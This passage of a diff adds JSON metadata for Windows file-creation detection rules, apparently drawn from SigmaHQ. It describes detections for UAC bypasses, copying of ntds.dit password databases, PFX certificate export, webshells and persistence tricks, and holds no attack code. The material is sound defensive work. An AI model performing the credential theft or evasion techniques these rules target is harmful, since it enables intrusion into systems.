+ "filename": "file_event_win_susp_diagcab.yml",
+ "author": "frack113",
+ "level": "medium",
+ "falsepositive": [
+ "Legitimate microsoft diagcab"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.",
+ "uuid": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e",
+ "value": "Suspicious Double Extension Files",
+ "meta": {
+ "refs": [
+ "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/",
+ "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations",
+ "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles",
+ "https://twitter.com/malwrhunterteam/status/1235135745611960321",
+ "https://twitter.com/luc4m/status/1073181154126254080",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_double_extension.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ 
"attack.t1036.007"
+ ],
+ "creation_date": "2022/06/19",
+ "filename": "file_event_win_susp_double_extension.yml",
+ "author": "Nasreddine Bencherchali, frack113",
+ "level": "high",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the creation of an executable by another executable",
+ "uuid": "297afac9-5d02-4138-8c58-b977bac60556",
+ "value": "Creation of an Executable by an Executable",
+ "meta": {
+ "refs": [
+ "Malware Sandbox",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_dropper.yml"
+ ],
+ "tags": [
+ "attack.resource_development",
+ "attack.t1587.001"
+ ],
+ "creation_date": "2022/03/09",
+ "filename": "file_event_win_susp_dropper.yml",
+ "author": "frack113",
+ "level": "low",
+ "falsepositive": [
+ "Software installers",
+ "Update utilities"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation",
+ "uuid": "7280c9f3-a5af-45d0-916a-bc01cb4151c9",
+ "value": "Suspicious MSExchangeMailboxReplication ASPX Write",
+ "meta": {
+ "refs": [
+ "https://redcanary.com/blog/blackbyte-ransomware/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_exchange_aspx_write.yml"
+ ],
+ "tags": [
+ "attack.initial_access",
+ "attack.t1190",
+ "attack.persistence",
+ "attack.t1505.003"
+ ],
+ "creation_date": "2022/02/25",
+ "filename": "file_event_win_susp_exchange_aspx_write.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detect creation of suspicious executable file name. 
Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.",
+ "uuid": "74babdd6-a758-4549-9632-26535279e654",
+ "value": "Suspicious Executable File Creation",
+ "meta": {
+ "refs": [
+ "https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae",
+ "https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_executable_creation.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1564"
+ ],
+ "creation_date": "2022/09/05",
+ "filename": "file_event_win_susp_executable_creation.yml",
+ "author": "frack113",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n",
+ "uuid": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b",
+ "value": "Suspicious Get-Variable.exe Creation",
+ "meta": {
+ "refs": [
+ "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/",
+ "https://www.joesandbox.com/analysis/465533/0/html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_get_variable.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1546",
+ "attack.defense_evasion",
+ "attack.t1027"
+ ],
+ "creation_date": "2022/04/23",
+ "filename": "file_event_win_susp_get_variable.yml",
+ "author": "frack113",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": 
"windows"
+ }
+ },
+ {
+ "description": "Detects dropped files with LNK double extension, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.",
+ "uuid": "3215aa19-f060-4332-86d5-5602511f3ca8",
+ "value": "Suspicious LNK Double Extension Files",
+ "meta": {
+ "refs": [
+ "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/",
+ "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations",
+ "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles",
+ "https://twitter.com/malwrhunterteam/status/1235135745611960321",
+ "https://twitter.com/luc4m/status/1073181154126254080",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1036.007"
+ ],
+ "creation_date": "2022/11/07",
+ "filename": "file_event_win_susp_lnk_double_extension.yml",
+ "author": "Nasreddine Bencherchali, frack113",
+ "level": "medium",
+ "falsepositive": [
+ "Users creating a shortcut on e.g. 
desktop"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file",
+ "uuid": "11b1ed55-154d-4e82-8ad7-83739298f720",
+ "value": "Suspicious Process Writes Ntds.dit",
+ "meta": {
+ "refs": [
+ "https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/",
+ "https://adsecurity.org/?p=2398",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_ntds_dit.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003.002",
+ "attack.t1003.003"
+ ],
+ "creation_date": "2022/01/11",
+ "filename": "file_event_win_susp_ntds_dit.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.",
+ "uuid": "dca1b3e8-e043-4ec8-85d7-867f334b5724",
+ "value": "Suspicious PFX File Creation",
+ "meta": {
+ "refs": [
+ "https://github.com/OTRF/detection-hackathon-apt29/issues/14",
+ "https://threathunterplaybook.com/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_pfx_file_creation.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1552.004"
+ ],
+ "creation_date": "2020/05/02",
+ "filename": "file_event_win_susp_pfx_file_creation.yml",
+ "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)",
+ "level": "medium",
+ "falsepositive": [
+ "System administrators managing certififcates." 
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence",
+ "uuid": "b5b78988-486d-4a80-b991-930eff3ff8bf",
+ "value": "PowerShell Profile Modification",
+ "meta": {
+ "refs": [
+ "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/",
+ "https://persistence-info.github.io/Data/powershellprofile.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_powershell_profile.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.privilege_escalation",
+ "attack.t1546.013"
+ ],
+ "creation_date": "2019/10/24",
+ "filename": "file_event_win_susp_powershell_profile.yml",
+ "author": "HieuTT35, Nasreddine Bencherchali",
+ "level": "high",
+ "falsepositive": [
+ "System administrator create Powershell profile manually"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n",
+ "uuid": "3da70954-0f2c-4103-adff-b7440368f50e",
+ "value": "Suspicious PROCEXP152.sys File Created In TMP",
+ "meta": {
+ "refs": [
+ "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml"
+ ],
+ "tags": [
+ "attack.t1562.001",
+ "attack.defense_evasion"
+ ],
+ "creation_date": "2019/04/08",
+ "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml",
+ "author": "xknow (@xknow_infosec), xorxes (@xor_xes)",
+ "level": "medium",
+ 
"falsepositive": [
+ "Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it."
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below",
+ "uuid": "ce7066a6-508a-42d3-995b-2952c65dc2ce",
+ "value": "Drop Binaries Into Spool Drivers Color Folder",
+ "meta": {
+ "refs": [
+ "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion"
+ ],
+ "creation_date": "2022/07/28",
+ "filename": "file_event_win_susp_spool_drivers_color_drop.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects when a file with a suspicious extension is created in the startup folder",
+ "uuid": "28208707-fe31-437f-9a7f-4b1108b94d2e",
+ "value": "Suspicious Startup Folder Persistence",
+ "meta": {
+ "refs": [
+ "https://github.com/last-byte/PersistenceSniper",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1547.001"
+ ],
+ "creation_date": "2022/08/10",
+ "filename": "file_event_win_susp_startup_folder_persistence.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "high",
+ "falsepositive": [
+ "Rare legitimate usage of some of the extensions mentioned in the rule"
+ ],
+ "logsource.category": "file_event",
+ 
"logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context",
+ "uuid": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2",
+ "value": "Suspicious Interactive PowerShell as SYSTEM",
+ "meta": {
+ "refs": [
+ "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml"
+ ],
+ "tags": "No established tags",
+ "creation_date": "2021/12/07",
+ "filename": "file_event_win_susp_system_interactive_powershell.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Administrative activity",
+ "PowerShell scripts running as SYSTEM user"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the creation of tasks from processes executed from suspicious locations",
+ "uuid": "80e1f67a-4596-4351-98f5-a9c3efabac95",
+ "value": "Suspicious Scheduled Task Write to System32 Tasks",
+ "meta": {
+ "refs": [
+ "Internal Research",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_task_write.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.execution",
+ "attack.t1053"
+ ],
+ "creation_date": "2021/11/16",
+ "filename": "file_event_win_susp_task_write.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the creation of log files during a TeamViewer remote session",
+ "uuid": "162ab1e4-6874-4564-853c-53ec3ab8be01",
+ "value": "TeamViewer Remote Session",
+ "meta": {
+ "refs": [
+ "https://www.teamviewer.com/en-us/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_teamviewer_remote_session.yml"
+ ],
+ 
"tags": [
+ "attack.command_and_control",
+ "attack.t1219"
+ ],
+ "creation_date": "2022/01/30",
+ "filename": "file_event_win_susp_teamviewer_remote_session.yml",
+ "author": "Florian Roth",
+ "level": "medium",
+ "falsepositive": [
+ "Legitimate uses of TeamViewer in an organisation"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence",
+ "uuid": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502",
+ "value": "VsCode Powershell Profile Modification",
+ "meta": {
+ "refs": [
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_vscode_powershell_profile.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.privilege_escalation",
+ "attack.t1546.013"
+ ],
+ "creation_date": "2022/08/24",
+ "filename": "file_event_win_susp_vscode_powershell_profile.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "high",
+ "falsepositive": [
+ "Legitimate use of the profile by developers or administrators"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the creation of an file in user Word Startup",
+ "uuid": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d",
+ "value": "Creation In User Word Startup Folder",
+ "meta": {
+ "refs": [
+ "Malware Sandbox https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_winword_startup.yml"
+ ],
+ "tags": [
+ "attack.resource_development",
+ "attack.t1587.001"
+ ],
+ "creation_date": "2022/06/05",
+ "filename": "file_event_win_susp_winword_startup.yml",
+ "author": "frack113",
+ "level": "medium",
+ 
"falsepositive": [
+ "Addition of legitimate plugins"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects default PsExec service filename which indicates PsExec service installation and execution",
+ "uuid": "259e5a6a-b8d2-4c38-86e2-26c5e651361d",
+ "value": "PsExec Service File Creation",
+ "meta": {
+ "refs": [
+ "https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
+ "https://jpcertcc.github.io/ToolAnalysisResultSheet",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_tool_psexec.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1569.002",
+ "attack.s0029"
+ ],
+ "creation_date": "2017/06/12",
+ "filename": "file_event_win_tool_psexec.yml",
+ "author": "Thomas Patzke",
+ "level": "low",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder",
+ "uuid": "52753ea4-b3a0-4365-910d-36cff487b789",
+ "value": "Hijack Legit RDP Session to Move Laterally",
+ "meta": {
+ "refs": [
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_tsclient_filewrite_startup.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1219"
+ ],
+ "creation_date": "2019/02/21",
+ "filename": "file_event_win_tsclient_filewrite_startup.yml",
+ "author": "Samir Bousseaden",
+ "level": "high",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)",
+ "uuid": "62ed5b55-f991-406a-85d9-e8e8fdf18789",
+ "value": "UAC Bypass Using Consent and Comctl32 - File",
+ "meta": {
+ "refs": [
+ "https://github.com/hfiref0x/UACME",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.privilege_escalation",
+ "attack.t1548.002"
+ ],
+ "creation_date": "2021/08/23",
+ "filename": "file_event_win_uac_bypass_consent_comctl32.yml",
+ "author": "Christian Burkard",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)",
+ "uuid": "93a19907-d4f9-4deb-9f91-aac4692776a6",
+ "value": "UAC Bypass Using .NET Code Profiler on MMC",
+ "meta": {
+ "refs": [
+ "https://github.com/hfiref0x/UACME",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.privilege_escalation",
+ "attack.t1548.002"
+ ],
+ "creation_date": "2021/08/30",
+ "filename": "file_event_win_uac_bypass_dotnet_profiler.yml",
+ "author": "Christian Burkard",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the pattern of a UAC bypass using Windows Event Viewer",
+ "uuid": "63e4f530-65dc-49cc-8f80-ccfa95c69d43",
+ "value": "UAC Bypass Using EventVwr",
+ "meta": {
+ "refs": [
+ "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw",
+ "https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g",
+ "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.privilege_escalation"
+ ],
+ "creation_date": "2022/04/27",
+ "filename": 
"file_event_win_uac_bypass_eventvwr.yml", + "author": "Antonio Cocomazzi (idea), Florian Roth (rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", + "uuid": "48ea844d-19b1-4642-944e-fe39c2cc1fec", + "value": "UAC Bypass Using IDiagnostic Profile - File", + "meta": { + "refs": [ + "https://github.com/Wh04m1001/IDiagnosticProfileUAC", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2022/07/03", + "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "uuid": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", + "value": "UAC Bypass Using IEInstal - File", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ieinstal.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/30", + "filename": "file_event_win_uac_bypass_ieinstal.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "uuid": "41bb431f-56d8-4691-bb56-ed34e390906f", + "value": "UAC 
Bypass Using MSConfig Token Modification - File", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/30", + "filename": "file_event_win_uac_bypass_msconfig_gui.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "uuid": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", + "value": "UAC Bypass Using NTFS Reparse Point - File", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/30", + "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "uuid": "155dbf56-e0a4-4dd0-8905-8a98705045e8", + "value": "UAC Bypass Abusing Winsat Path Parsing - File", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_winsat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/30", + "filename": "file_event_win_uac_bypass_winsat.yml", + "author": 
"Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "uuid": "68578b43-65df-4f81-9a9b-92f32711a951", + "value": "UAC Bypass Using Windows Media Player - File", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_wmp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/23", + "filename": "file_event_win_uac_bypass_wmp.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Possible webshell file creation on a static web site", + "uuid": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", + "value": "Windows Webshell Creation", + "meta": { + "refs": [ + "PT ESC rule and personal experience", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_webshell_creation_detect.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2019/10/22", + "filename": "file_event_win_webshell_creation_detect.yml", + "author": "Beyu Denis, oscd.community, Tim Shelton", + "level": "high", + "falsepositive": [ + "Legitimate administrator or developer creating legitimate executable files in a web application folder" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", + "uuid": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", + "value": "Creation of an WerFault.exe in Unusual Folder", + "meta": { + "refs": [ + 
"https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_werfault_dll_hijacking.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001" + ], + "creation_date": "2022/05/09", + "filename": "file_event_win_werfault_dll_hijacking.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", + "uuid": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", + "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File", + "meta": { + "refs": [ + "https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2020/10/06", + "filename": "file_event_win_winrm_awl_bypass.yml", + "author": "Julia Fomina, oscd.community", + "level": "medium", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", + "uuid": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", + "value": "Suspicious Word Cab File Write CVE-2021-40444", + "meta": { + "refs": [ + "https://twitter.com/RonnyTNL/status/1436334640617373699?s=20", + "https://twitter.com/vanitasnk/status/1437329511142420483?s=21", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winword_cve_2021_40444.yml" + ], + "tags": [ + 
"attack.resource_development", + "attack.t1587" + ], + "creation_date": "2021/09/10", + "filename": "file_event_win_winword_cve_2021_40444.yml", + "author": "Florian Roth, Sittikorn S", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of the default output filename used by the wmicexec tool", + "uuid": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", + "value": "Wmiexec Default Output File", + "meta": { + "refs": [ + "https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1047" + ], + "creation_date": "2022/06/02", + "filename": "file_event_win_wmiexec_default_filename.yml", + "author": "Nasreddine Bencherchali", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "uuid": "614a7e17-5643-4d89-b6fe-f9df1a79641c", + "value": "Wmiprvse Wbemcomn DLL Hijack - File", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2020/10/12", + "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + 
"logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects file writes of WMI script event consumer", + "uuid": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "value": "WMI Persistence - Script Event Consumer File Write", + "meta": { + "refs": [ + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmi_persistence_script_event_consumer_write.yml" + ], + "tags": [ + "attack.t1546.003", + "attack.persistence" + ], + "creation_date": "2018/03/07", + "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml", + "author": "Thomas Patzke", + "level": "high", + "falsepositive": [ + "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of template files for Microsoft Office from outside Office", + "uuid": 